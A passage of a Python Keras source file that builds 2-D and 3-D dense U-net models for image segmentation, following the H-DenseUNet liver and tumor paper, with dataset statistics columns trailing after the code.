upsampling_layer = UpSampling2D(size=(2, 2))(outputs)
outputs = Add()([local_layer, upsampling_layer])
local_layer = box_layers[box_count - 1]
box_count -= 1
local_number_of_filters = (K.int_shape(box_layers[box_count]))[-1]
outputs = Conv2D(filters=local_number_of_filters,
kernel_size=(3, 3),
padding='same',
kernel_initializer='normal')(outputs)
if i == (number_of_dense_blocks - 2):
outputs = Dropout(rate=0.3)(outputs)
outputs = BatchNormalization(epsilon=1.1e-5,
axis=concatenation_axis)(outputs)
outputs = Activation(activation='relu')(outputs)
convActivation = ''
if mode == 'classification':
convActivation = 'softmax'
elif mode == 'regression':
convActivation = 'linear'
else:
raise ValueError('mode must be either `classification` or `regression`.')
outputs = Conv2D(filters=number_of_outputs,
kernel_size=(1, 1),
activation = convActivation,
kernel_initializer='normal')(outputs)
denseunet_model = Model(inputs=inputs, outputs=outputs)
return denseunet_model
def create_denseunet_model_3d(input_image_size,
number_of_outputs=1,
number_of_layers_per_dense_block=(6, 12, 36, 24),
growth_rate=48,
initial_number_of_filters=96,
reduction_rate=0.0,
depth=7,
dropout_rate=0.0,
weight_decay=1e-4,
mode='classification'
):
"""
2-D implementation of the dense U-net deep learning architecture.
Creates a keras model of the dense U-net deep learning architecture for
image segmentation
X. Li, H. Chen, X. Qi, Q. Dou, C.-W. Fu, P.-A. Heng. H-DenseUNet: Hybrid
Densely Connected UNet for Liver and Tumor Segmentation from CT Volumes
available here:
https://arxiv.org/pdf/1709.07330.pdf
with the author's implementation available at:
https://github.com/xmengli999/H-DenseUNet
Arguments
---------
input_image_size : tuple of length 4
Used for specifying the input tensor shape. The
shape (or dimension) of that tensor is the image dimensions followed by
the number of channels (e.g., red, green, and blue). The batch size
(i.e., number of training images) is not specified a priori.
number_of_outputs : integer
Meaning depends on the mode. For 'classification' this is the number of
segmentation labels. For 'regression' this is the number of outputs.
number_of_layers_per_dense_blocks : tuple
Number of dense blocks per layer.
growth_rate : integer
Number of filters to add for each dense block layer (default = 48).
initial_number_of_filters : integer
Number of filters at the beginning (default = 96).
reduction_rate : scalar
Reduction factor of transition blocks.
depth : integer
Number of layers---must be equal to 3 * N + 4 where N is an integer
(default = 7).
dropout_rate : scalar
Float between 0 and 1 to use between dense layers.
weight_decay : scalar
Weighting parameter for L2 regularization of the kernel weights of the
convolution layers (default = 1e-4).
Returns
-------
Keras model
A 3-D Keras model defining the network.
Example
-------
>>> model = create_denseunet_model_3d((128, 128, 128, 1))
>>> model.summary()
"""
concatenation_axis=1
if K.image_data_format() == 'channels_last':
concatenation_axis=-1
def convolution_factory_3d(model, number_of_filters,
kernel_size=(3, 3, 3),
dropout_rate=0.0, weight_decay=1e-4):
# Bottleneck layer
model = BatchNormalization(axis=concatenation_axis)(model)
model = Scale(axis=concatenation_axis)(model)
model = Activation('relu')(model)
model = Conv3D(filters=(number_of_filters * 4),
kernel_size=(1, 1, 1),
use_bias=False)(model)
if dropout_rate > 0.0:
model = Dropout(rate=dropout_rate)(model)
# Convolution layer
model = BatchNormalization(axis=concatenation_axis,
epsilon=1.1e-5)(model)
model = Scale(axis=concatenation_axis)(model)
model = Activation(activation='relu')(model)
model = ZeroPadding3D(padding=(1, 1, 1))(model)
model = Conv3D(filters=number_of_filters,
kernel_size=kernel_size,
use_bias=False)(model)
if dropout_rate > 0.0:
model = Dropout(rate=dropout_rate)(model)
return(model)
def transition_3d(model, number_of_filters, compression_rate=1.0,
dropout_rate=0.0, weight_decay=1e-4):
model = BatchNormalization(axis=concatenation_axis,
gamma_regularizer=regularizers.l2(weight_decay),
beta_regularizer=regularizers.l2(weight_decay))(model)
model = Scale(axis=concatenation_axis)(model)
model = Activation(activation='relu')(model)
model = Conv3D(filters=int(number_of_filters * compression_rate),
kernel_size=(1, 1, 1),
use_bias=False)(model)
if dropout_rate > 0.0:
model = Dropout(rate=dropout_rate)(model)
model = AveragePooling3D(pool_size=(2, 2, 2),
strides=(2, 2, 2))(model)
return(model)
def create_dense_blocks_3d(model, number_of_filters, depth, growth_rate,
dropout_rate=0.0, weight_decay=1e-4):
dense_block_layers = [model]
for i in range(depth):
model = convolution_factory_3d(model, number_of_filters=growth_rate,
kernel_size=(3, 3, 3), dropout_rate=dropout_rate,
weight_decay=weight_decay)
dense_block_layers.append(model)
model = Concatenate(axis=concatenation_axis)(dense_block_layers)
number_of_filters += growth_rate
return(model, number_of_filters)
if ((depth - 4) % 3) != 0:
raise ValueError('Depth must be equal to 3*N+4 where N is an integer.')
number_of_layers = int((depth - 4) % 3)
number_of_dense_blocks = len(number_of_layers_per_dense_block)
inputs = Input(shape = input_image_size)
box_layers = []
box_count = 1
# Initial convolution
outputs = ZeroPadding3D(padding=(3, 3))(inputs)
outputs = Conv3D(filters=initial_number_of_filters,
kernel_size=(7, 7, 7),
strides=(2, 2, 2),
use_bias=False)(outputs)
outputs = BatchNormalization(epsilon=1.1e-5,
axis=concatenation_axis)(outputs)
outputs = Scale(axis=concatenation_axis)(outputs)
outputs = Activation(activation='relu')(outputs)
box_layers.append(outputs)
box_count += 1
outputs = ZeroPadding3D(padding=(1, 1, 1))(outputs)
outputs = MaxPooling3D(pool_size=(3, 3, 3),
strides=(2, 2, 2))(outputs)
# Add dense blocks
nFilters = initial_number_of_filters
for i in range(number_of_dense_blocks - 1):
outputs, number_of_filters = \
create_dense_blocks_3d(outputs, number_of_filters=nFilters,
depth=number_of_layers_per_dense_block[i],
growth_rate=growth_rate, dropout_rate=dropout_rate,
weight_decay=weight_decay)
box_layers.append(outputs)
box_count += 1
outputs = transition_3d(outputs, number_of_filters=number_of_filters,
compression_rate=(1.0 - reduction_rate),
dropout_rate=dropout_rate, weight_decay=weight_decay)
nFilters = int(number_of_filters * (1 - reduction_rate))
outputs, nFilters = \
create_dense_blocks_3d(outputs, number_of_filters=nFilters,
depth=number_of_layers_per_dense_block[number_of_dense_blocks - 1],
growth_rate=growth_rate, dropout_rate=dropout_rate,
weight_decay=weight_decay)
outputs = BatchNormalization(epsilon=1.1e-5,
axis=concatenation_axis)(outputs)
outputs = Scale(axis=concatenation_axis)(outputs)
outputs = Activation(activation='relu')(outputs)
box_layers.append(outputs)
box_count -= 1
local_number_of_filters = (K.int_shape(box_layers[box_count]))[-1]
local_layer = Conv3D(filters=local_number_of_filters,
kernel_size=(1, 1, 1),
padding='same',
kernel_initializer='normal')(box_layers[box_count - 1])
box_count -= 1
for i in range(number_of_dense_blocks - 1):
upsampling_layer = UpSampling3D(size=(2, 2, 2))(outputs)
outputs = Add()([local_layer, upsampling_layer])
local_layer = box_layers[box_count - 1]
box_count -= 1
local_number_of_filters = (K.int_shape(box_layers[box_count]))[-1]
outputs = Conv3D(filters=local_number_of_filters,
kernel_size=(3, 3, 3),
padding='same',
kernel_initializer='normal')(outputs)
if i == (number_of_dense_blocks - 2):
outputs = Dropout(rate=0.3)(outputs)
outputs = BatchNormalization(epsilon=1.1e-5,
axis=concatenation_axis)(outputs)
outputs = Activation(activation='relu')(outputs)
convActivation = ''
if mode == 'classification':
convActivation = 'softmax'
elif mode == 'regression':
convActivation = 'linear'
else:
raise ValueError('mode must be either `classification` or `regression`.')
outputs = Conv3D(filters=number_of_outputs,
kernel_size=(1, 1, 1),
activation = convActivation,
kernel_initializer='normal')(outputs)
denseunet_model = Model(inputs=inputs, outputs=outputs)
return denseunet_model
| 37.136882
| 97
| 0.588308
| 2,193
| 19,534
| 5.012312
| 0.102599
| 0.065502
| 0.068231
| 0.016558
| 0.933679
| 0.919487
| 0.918395
| 0.913664
| 0.900018
| 0.867813
| 0
| 0.028463
| 0.325535
| 19,534
| 525
| 98
| 37.207619
| 0.805844
| 0.191615
| 0
| 0.795918
| 0
| 0
| 0.028288
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027211
| false
| 0
| 0.02381
| 0
| 0.057823
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.